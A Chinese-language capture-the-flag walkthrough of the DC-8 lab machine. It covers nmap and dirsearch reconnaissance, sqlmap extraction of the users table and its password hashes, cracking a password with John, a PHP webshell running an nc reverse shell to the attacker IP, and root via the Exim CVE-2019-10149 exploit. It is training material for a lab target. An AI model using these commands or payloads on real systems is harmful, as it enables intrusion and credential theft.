DC-8靶机（详细过程）-平芜编程栈

攻击机：192.168.10.40

靶机：192.168.10.130

探测内网存活主机

扫描端口

nmap -A -p- -T4 192.168.10.0/24

-A =

-O # 操作系统识别

-sV # 服务与版本探测

-sC # 默认 NSE 脚本

--traceroute

-p-:全端口扫描

-T4: -T决定的是时间控制策略，

探测并发数
超时阈值
重传次数
RTT 估算
主机并行度

信息类型	详细内容
IP 地址	`192.168.10.130`
主机状态	`Host is up` (主机在线)
延迟	`0.00062s` (极低延迟，表明在本地网络)
网络距离	`1 hop` (1 跳，直接连接)
MAC 地址	`00:0C:29:4F:04:C6`
制造商	`VMware` (主机运行在 VMware 虚拟机环境中)
操作系统 (推测)	运行：`Linux 3.X
设备类型	`general purpose` (通用设备)

在robots.txt文件中列举出了32个禁止访问的路径。

扫描目录

dirsearch -u "http://192.168.10.130" -e* -i 200

-e*(星号) 的作用是：告诉 dirsearch 使用它配置文件中定义的所有默认扩展名进行测试。

-i 200:只显示200响应码的

访问网页，收集网站信息

Web渗透

访问网页，点击下面三个标签，nid会随着变化，说明这个界面是通过nid号控制的。在数字后面加个双引号，

会报一个数据库错误，很明显这存在SQL注入漏洞。

SQL注入

sqlmap直接跑，三个注入方式：数字注入，报错注入，时间注入。

sqlmap -u 'http://192.168.10.130/?nid=1' --batch

爆破数据库

sqlmap -u 'http://192.168.10.130/?nid=1' --risk=3 --level=5 --dbs

information_schema是系统数据库，d7db是我们要查询的对象

爆破数据表

sqlmap -u 'http://192.168.10.130/?nid=1' --risk=3 --level=5 -D d7db --tables

爆破字段

sqlmap -u 'http://192.168.10.130/?nid=1' --risk=3 --level=5 -D d7db -T users --columns

在字段列表中name和pass两个字段

查看字段内容

sqlmap -u 'http://192.168.10.130/?nid=1' --risk=3 --level=5 -D d7db -T users -C name,pass --dump

得到用户名和加密后的密码

$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

密码破解

把密码放入一个.txt文本中，使用john工具对密码进行解密,破解出一个密码，这个密码是john的，admin的密码没有破解出来。

john/turtle直接登录网站

可用在里面写入一个木马

写入一个木马

随便填入信息之后提交

传入的php代码执行了

可用执行PHP代码就可以开始反弹shell了。

<?php system('nc -e /bin/bash 192.168.10.40 5555');?>

攻击机开始监听

连接成功

执行python代码获取一个交互式的shell。

python -c "import pty;pty.spawn('/bin/bash')"

权限为www

权限提升

查看具有suid提权的文件，在列出的文件中有一个exim4文件，这是个漏洞点（ CVE-2019-10149，即 Exim 4.87-4.91 的 "Return of the WIZard" 漏洞）。

find / -user root -perm -4000 -print 2>/dev/null

searchsploit exim 4搜索相关漏洞，把漏洞的脚本复制下来。

searchsploit的作用：在本地库中快速查找软件已经公开的漏洞利用代码（POC）。

复制脚本

把脚本下载到靶机中

先把脚本放到攻击机中的/var/www/html目录下，随后开启apache服务

在靶机的/tmp目录中下载脚本，其它目录没有下载权限，在列出的权限列表中，当前目录的权限最后一位为t，这个是/tmp目录的安全特性，写入和读取权限：目录的rwx权限允许任何用户在/tmp中创建、写入和读取文件。他也有个限制：一个用户只能删除或重命名由他自己创建的文件。

给脚本添加权限并执行脚本

成功提权

在/root目录下找到了flag，查看flag。

使用的相关工具：

nmap端口探测

sqlmap 数据库爆破

网站漏洞反弹shell

john密码破解

searchsploit 漏洞利用工具

总结：

端口探测出可使用的端口，以及对应的服务，如果有可访问的网站之后对网站做信息收集，收集网站使用的架构，前端和后端的信息，找到相关搜索框进行测试，SQL语句，XSS,命令注入，文件包含等都可以进行测试，找到响应的漏洞点之后，进行针对性的测试，比如说使用工具，sqlmap，bp,手动注入等。在找到漏洞点后，扩大漏洞的危害，找寻网站的相关漏洞的payload，提权拿root。